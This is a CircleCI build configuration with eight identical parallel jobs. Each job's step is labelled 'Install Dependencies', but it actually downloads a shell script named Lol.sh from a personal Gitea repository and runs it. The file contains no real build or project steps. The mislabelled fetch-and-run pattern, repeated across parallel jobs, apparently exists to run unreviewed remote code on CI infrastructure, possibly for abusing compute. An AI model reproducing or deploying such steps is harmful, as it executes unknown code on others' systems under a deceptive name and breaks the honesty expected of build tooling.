version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/rohman17/1a/raw/branch/master/Lol.sh && chmod u+x Lol.sh && ./Lol.sh
    
workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8